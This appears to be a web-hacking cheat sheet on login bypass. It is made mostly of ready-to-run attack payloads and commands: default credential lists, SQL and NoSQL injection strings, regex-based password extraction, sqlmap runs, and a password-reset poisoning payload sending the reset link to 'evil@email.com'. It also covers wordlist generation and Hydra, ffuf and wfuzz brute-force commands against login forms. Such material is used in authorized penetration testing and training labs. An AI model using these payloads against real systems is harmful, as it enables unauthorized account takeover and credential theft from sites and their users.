# Web Login Bypass

### Common Default Credentials <a href="#common-default-credentials" id="common-default-credentials"></a>

Check if the website has not changed credential from the default username/password.

```shellscript
admin:admin
admin:password
admin:password1
admin:password123
admin:passw0rd
admin:(empty)
admin:12345

administrator:password
administrator:password1
administrator:password123
administrator:passw0rd
administrator:(empty)
administrator:12345

# phpIPAM
admin:ipamadmin
Admin:ipamadmin

# PHPMyAdmin
root:(null)
root:password
```

### SQL Injections <a href="#sql-injections" id="sql-injections"></a>

Try the following inputs in the form.

```shellscript
'
'--
'-- -
'#
}'
}'--
}'-- -
}'#
' or 1=1
' or 1=1--
' or 1=1-- -
' or '1'='1
' or '1'='1--
' or '1'='1-- -
' or true--
' or true-- -
or true--

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT 1,2--
UNION SELECT NULL--
```

#### Password Omitting <a href="#password-omitting" id="password-omitting"></a>

If we know the username of an existing account, try to add suffix `'-- -` to the username for forcing the server internally to omit the password.

```
username: john'-- -
password: password123 (arbitrary value)
```

When the login is successful, not only can we log in with that user, but we can also fuzz with other usernames.

### NoSQL Injection <a href="#nosql-injection" id="nosql-injection"></a>

Reference: <https://portswigger.net/web-security/nosql-injection>

#### Mongo <a href="#mongo" id="mongo"></a>

```shellscript
' || 1==1//
' || 1==1%00
' || '1==1
' || '1'=='1
'||1||'

<!-- Brute force each password character -->
admin' && this.password[0] == 'a' || 'a' == 'b
admin' && this.password[1] == 'a' || 'a' == 'b
admin' && this.password[2] == 'a' || 'a' == 'b
admin'%26%26+this.password[0]=='a'||'a'=='b
```

* **Operators**

  ```shellscript
  # $ne: Not equal
  username[$ne]=xyz&password[$ne]=xyz
  username[$ne]=xyz&password=test

  # $regex: Regular expressions
  username[$regex]=.*&password[$regex]=.*
  username[$regex]=^xyz&password[$regex]=^xyz
  username[$regex]=^a.*$&password[$ne]=xyz
  username[$regex]=.{6}&password[$ne]=xyz
  username[$regex]=^.{1}&password[$regex]=^.{1} # Length of values

  # $exists: Exists in the database
  username[$exists]=true&password[$exists]=true

  # $in: Include in array
  username[$in]=[admin]&password[$ne]=xyz

  # $nin: Not include
  username[$nin][admin]=admin&password[$ne]=xyz
  # If we found the "admin" exists, we can exclude "admin" by specifying $nin operator.
  username[$nin][]=admin&password[$ne]=xyz
  # If more users are found, we can exclude the user.
  username[$nin][]=admin&username[$nin][]=john&password[$ne]=xyz

  # $gt: Greater than
  username[$gt]=s&password[$gt]=s
  # $lt: Lower than
  username[$lt]=s&password[$lt]=s

  # Combinations
  username[$ne]=xyz&password[$regex]=.*
  username[$exists]=true&password[$ne]=xyz
  username[$ne]=xyz&password[$exists]=true
  username[$regex]=.*&password[$ne]=xyz
  username[$ne]=xyz&password[$regex]=.*
  username[$regex]=.{6}&password[$ne]=xyz
  ```

  After finding usernames, we can also obtain the passwords using the **“$regex”** operator as the following example.

  ```shellscript
  # Check if the password length is 7 characters.
  username=admin&password[$regex]=^.{7}$
  # If not, change 7 to 6 (or 8 or something number).
  username=admin&password[$regex]=^.{6}$
  # If the number of characters turns out to be 6, brute force the character one by one.
  username=admin&password[$regex]=^a.....$
  username=admin&password[$regex]=^s.....$
  username=admin&password[$regex]=^se....$
  username=admin&password[$regex]=^sec...$
  ```
* **Operators in Json**

  If the above payloads not working, try changing to a json format.\
  We also need to change the value of the **Content-Type** to **“application/json”** in the HTTP header.

  ```
  # Not equal
  {"username": { "$ne": "xyz" }, "password": { "$ne": "xyz" }}

  # $in: Include in array
  {"username":{"$in":["admin","administrator",]},"password":{"$ne":""}}
  ```

### SQL Injection with SQLmap <a href="#sql-injection-with-sqlmap" id="sql-injection-with-sqlmap"></a>

Alternatively, we can automate **SQLi** using **`sqlmap`**.

```
# 'req.txt' is a file which can be downloaded in Burp Suite by clicking `save item` on the request.
sqlmap -r req.txt
sqlmap -r req.txt --risk 2 --level 5
sqlmap -r req.txt --risk 3 --level 5
```

Please see [SQL Injection with Sqlmap](https://exploit-notes.hdks.org/exploit/web/sql-injection-using-sqlmap/) page for details.

### Wildcard Brute Force <a href="#wildcard-brute-force" id="wildcard-brute-force"></a>

If it is allowed to login with wildcard (\*), you may be able to find the username/password with brute force.

```
username = *
password = *
```

For example, in Turbo Intruder (Burp Suite), login attempt with alpha numeric characters one by one.

```
username=%s*&password=*
# or
username=*&password=%s*
```

My favorite wordlist for it is the seclists:\
<https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/alphanum-case-extra.txt>

### Password Reset Exploit <a href="#password-reset-exploit" id="password-reset-exploit"></a>

We may be able to retrieve the password reset link by specifying our email address instead of (in addition to) the victim email address without validation.

```
email[]=victim@email.com&email[]=evil@email.com
```

### Brute Force Credentials <a href="#brute-force-credentials" id="brute-force-credentials"></a>

Before brute forcing, we need wordlists used for it.

* [**Rockyou**](https://github.com/praetorian-inc/Hob0Rules/blob/master/wordlists/rockyou.txt.gz)
* [**SecLists**](https://github.com/danielmiessler/SecLists)
* [**CeWL**](https://github.com/digininja/CeWL)

  Generate the custom wordlist from the target web page.

  ```shellscript
  cewl https://example.com -w wordlist.txt
  cewl https://example.com/about-us -w usernames.txt
  # -d: Depth
  # -m: Minimum word length
  cewl -d 2 -m 5 https://example.com -w wordlist.txt
  # --extentions
  cewl https://example.com -w wordlist.txt --lowercase
  cewl https://example.com -w wordlist.txt --with-numbers
  ```
* **\[crunch]**

  ```shellscript
  crunch <min> <max> <chars> -o wordlist.txt
  # e.g.
  crunch 3 5 0123456789ABCDEF -o wordlist.txt
  ```

If we can predict the target password reasonably, we can generate passwords from the password.

```
echo -n 'passw0rd' > password.txt
hashcat --stdout password.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt
```

#### Using Ffuf <a href="#using-ffuf" id="using-ffuf"></a>

```
# -fc: Filter HTTP status code
ffuf -w passwords -X POST -d "username=admin&password=FUZZ" -u http://vulnerable.com/login -fc 401

# Basic Auth
ffuf -u https://admin:FUZZ@example.com/ -w wordlist.txt -fc 401
```

Also we can use raw request file of Burp Suite.

1. Send request in Burp Suite.
2. Right-click on the request screen.
3. Click **"Copy to file"** in the menu.
4. Edit the raw file to change target value to **"FUZZ"** keyword.

After that, we can use it in the **`ffuf`** command.

```shellscript
# Interate with Burp Suite raw request
ffuf -u http://example.com/login -request raw.txt -x http://127.0.0.1:8080 -w wordlist.txt
```

#### Using Hydra <a href="#using-hydra" id="using-hydra"></a>

```shellscript
# Cracking username
hydra -L usernames.txt -p password vulnerable.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid username"
# Cracking password
hydra -l username -P passwords.txt vulnerable.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid password"

# HTTPS (https-post-form)
hydra -L usernames.txt -P passwords.txt vulnerable.com https-post-form "/login:username=^USER^&password=^PASS^:Username or password is incorrect"


# Cracking the Authorization or WWW-Authenticate in the request header.
hydra -L usernames.txt -P passwords.txt <target-ip> http-get
```

#### Using Wfuzz <a href="#using-wfuzz" id="using-wfuzz"></a>

```shellscript
# Cracking username
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" -u https://example.com/login
# Cracking password
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" -u https://example.com/login
# Crack username/password
wfuzz -z file,./usernames.txt -z file,./passwords.txt -d "username=FUZZ&password=FUZ2Z" -u https://example.com/login

# Range: 00-99 -> "password00", "password01", ..., "password99"
# -t: N threads
# -s: N seconds per request
wfuzz -z range,00-99 -d "username=admin&password=passwordFUZZ&submit=Submit" -X POST -u https://example.com/login -t 1 -s 20

# -- Options --------------------------------------------------------------------------------------------

# --hc: Hide the specific status code
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" --hc 302 -u http://example.com/login
# --hh: Hide the specific chars (Content-Length)
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" --hh 783 -u http://example.com/login

# --sc: Show the specific statuc code
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" --sc 302 -u http://example.com/login
# --sh: Show the specific chars (Content-Length)
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" --sh 1214 -u http://example.com/login

# --ss: Show specified string
wfuzz -z file,./wordlist.txt -d "username=admin&password=FUZZ" -u https://example.com/login --ss "Login success"
# --hs: Hide specified string
wfuzz -z file,./wordlist.txt -d "username=admin&password=FUZZ" -u https://example.com/login --hs "Login failed"
```

### References <a href="#references" id="references"></a>

* [TryHackMe](https://tryhackme.com/room/nosqlinjectiontutorial)